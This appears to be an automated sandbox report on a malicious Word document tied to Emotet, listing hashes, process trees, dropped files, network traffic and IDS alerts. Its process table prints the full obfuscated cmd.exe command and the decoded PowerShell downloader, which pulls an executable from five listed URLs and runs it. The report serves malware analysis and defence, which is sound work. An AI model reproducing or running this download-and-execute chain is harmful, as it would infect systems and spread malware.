File name: | ATTBusiness_12_18_18.doc |
Full analysis: | https://app.any.run/tasks/30a47721-fc78-4863-8b00-d99eb739fb38 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | December 18, 2018, 20:08:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 17:28:00 2018, Last Saved Time/Date: Tue Dec 18 17:28:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 33, Security: 0 |
MD5: | 91497600F2EA438C4C54C211CD2FB85A |
SHA1: | E2C66857F627451ED2D8476CCAC8672573400325 |
SHA256: | 4DFC338ADC4731EA90DFCF9DD37546081AB4AC95872FC150CC5608C8FAFF0C57 |
SSDEEP: | 3072:g0nbUh0eeTswVj8GhDS0o9zTGOZD6EbzCdyyjNmXZI:XRoUOZDlbeyyj4XZI |
Extension | Type |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Property | Value |
---|---|
Title: | - |
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:18 17:28:00 |
ModifyDate: | 2018:12:18 17:28:00 |
Pages: | 1 |
Words: | 5 |
Characters: | 33 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 37 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3220 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ATTBusiness_12_18_18.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2604 | c:\o7555563226081\t2569490548\D569888924\..\..\..\windows\system32\cmd.exe /c %pROgRAMData:~0,1%%PRoGrAmDAta:~9,2% /v:o /c " SeT wo=;'640d'=689t$}}{hctac}};kaerb;'181Z'=140w$;135M$ metI-ekovnI{ )00008 eg- htgnel.)135M$ metI-teG(( fI;'189C'=952V$;)135M$ ,574M$(eliFdaolnwoD.842V${yrt{)310s$ ni 574M$(hcaerof;'exe.'+381F$+'\'+pmet:vne$=135M$;'577U'=004f$;'884' = 381F$;'929X'=302Q$;)'@'(tilpS.'CH43_kOq/eg.ytre-labolg.www//:ptth@ipAYvqb_I5GWNKHW/moc.cjotutitsni.www//:ptth@R9nsKFn_pKyIYFdi/ua.moc.htlaeherocne.www//:ptth@plXkk_N0iP9A/moc.gnihgnuhcgnok.www//:ptth@0rdDd1sNp_GrUVnB/moc.esikram-egitrewhcoh.www//:ptth'=310s$;tneilCbeW.teN tcejbo-wen=842V$;'745I'=300z$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&& For /l %A iN ( 582 -1 0) Do SeT WwRT=!WwRT!!wo:~ %A, 1!&&iF %A == 0 eCHO !WwRT:~6! | CM%os:~-7,-6% " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3196 | CmD /v:o /c " SeT wo=;'640d'=689t$}}{hctac}};kaerb;'181Z'=140w$;135M$ metI-ekovnI{ )00008 eg- htgnel.)135M$ metI-teG(( fI;'189C'=952V$;)135M$ ,574M$(eliFdaolnwoD.842V${yrt{)310s$ ni 574M$(hcaerof;'exe.'+381F$+'\'+pmet:vne$=135M$;'577U'=004f$;'884' = 381F$;'929X'=302Q$;)'@'(tilpS.'CH43_kOq/eg.ytre-labolg.www//:ptth@ipAYvqb_I5GWNKHW/moc.cjotutitsni.www//:ptth@R9nsKFn_pKyIYFdi/ua.moc.htlaeherocne.www//:ptth@plXkk_N0iP9A/moc.gnihgnuhcgnok.www//:ptth@0rdDd1sNp_GrUVnB/moc.esikram-egitrewhcoh.www//:ptth'=310s$;tneilCbeW.teN tcejbo-wen=842V$;'745I'=300z$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&& For /l %A iN ( 582 -1 0) Do SeT WwRT=!WwRT!!wo:~ %A, 1!&&iF %A == 0 eCHO !WwRT:~6! | CMd " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3380 | C:\Windows\system32\cmd.exe /S /D /c" eCHO pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $z003='I547';$V248=new-object Net.WebClient;$s013='http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0@http://www.kongchunghing.com/A9Pi0N_kkXlp@http://www.encorehealth.com.au/idFYIyKp_nFKsn9R@http://www.institutojc.com/WHKNWG5I_bqvYApi@http://www.global-erty.ge/qOk_34HC'.Split('@');$Q203='X929';$F183 = '488';$f400='U775';$M531=$env:temp+'\'+$F183+'.exe';foreach($M475 in $s013){try{$V248.DownloadFile($M475, $M531);$V259='C981';If ((Get-Item $M531).length -ge 80000) {Invoke-Item $M531;$w041='Z181';break;}}catch{}}$t986='d046'; " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3476 | CMd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3872 | powershell $z003='I547';$V248=new-object Net.WebClient;$s013='http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0@http://www.kongchunghing.com/A9Pi0N_kkXlp@http://www.encorehealth.com.au/idFYIyKp_nFKsn9R@http://www.institutojc.com/WHKNWG5I_bqvYApi@http://www.global-erty.ge/qOk_34HC'.Split('@');$Q203='X929';$F183 = '488';$f400='U775';$M531=$env:temp+'\'+$F183+'.exe';foreach($M475 in $s013){try{$V248.DownloadFile($M475, $M531);$V259='C981';If ((Get-Item $M531).length -ge 80000) {Invoke-Item $M531;$w041='Z181';break;}}catch{}}$t986='d046'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3100 | "C:\Users\admin\AppData\Local\Temp\488.exe" | C:\Users\admin\AppData\Local\Temp\488.exe | — | powershell.exe |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3808 | "C:\Users\admin\AppData\Local\Temp\488.exe" | C:\Users\admin\AppData\Local\Temp\488.exe | | 488.exe |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3556 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 488.exe |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa Exit code: 0 | ||||
4052 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | | archivesymbol.exe |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
3220 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR57B6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3220 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56E487A3.wmf | — | |
MD5:— | SHA256:— | |||
3220 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE5D84A9.wmf | — | |
MD5:— | SHA256:— | |||
3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MY7E1WNHZGHXHWHGW8PK.temp | — | |
MD5:— | SHA256:— | |||
3220 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:B92147F350B6247329D23527C873E925 | SHA256:26D657326BFF7F2F3C6A44095266C6E3C89387D8D02CDAF080804632F1AFC00E | |||
3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2467b3.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
3220 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:938948E1A9B5CCCD41DDF2AE5B1982CC | SHA256:9A49BCF648A150BB931D1B47986FCE304F265A6AFE647CB5300E69AE88CDFA23 | |||
3872 | powershell.exe | C:\Users\admin\AppData\Local\Temp\488.exe | executable | |
MD5:9083D6F31312A1E2588DF73195AE07F6 | SHA256:E1345BB7302FD0AC8BF303B9BB4A2BA426D160C1B9DBCEB15464CB10545E52E6 | |||
3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
3220 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D63C0FAA.wmf | wmf | |
MD5:1902BD1D0EE1D11C4CB92A8F96D6CDD7 | SHA256:577E19431A68CA3B4CBB0847822583285AEED4926C464E2ACAA44402317F37AD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3872 | powershell.exe | GET | 200 | 85.93.24.120:80 | http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0/ | DE | executable | 124 Kb | suspicious |
3872 | powershell.exe | GET | 301 | 85.93.24.120:80 | http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0 | DE | html | 260 b | suspicious |
4052 | archivesymbol.exe | GET | — | 217.173.64.242:443 | http://217.173.64.242:443/ | RU | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4052 | archivesymbol.exe | 217.173.64.242:443 | — | OOO WestCall Ltd. | RU | suspicious |
3872 | powershell.exe | 85.93.24.120:80 | www.hochwertige-markise.com | GHOSTnet GmbH | DE | suspicious |
Domain | IP | Reputation |
---|---|---|
www.hochwertige-markise.com | | suspicious |
PID | Process | Class | Message |
---|---|---|---|
3872 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3872 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3872 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |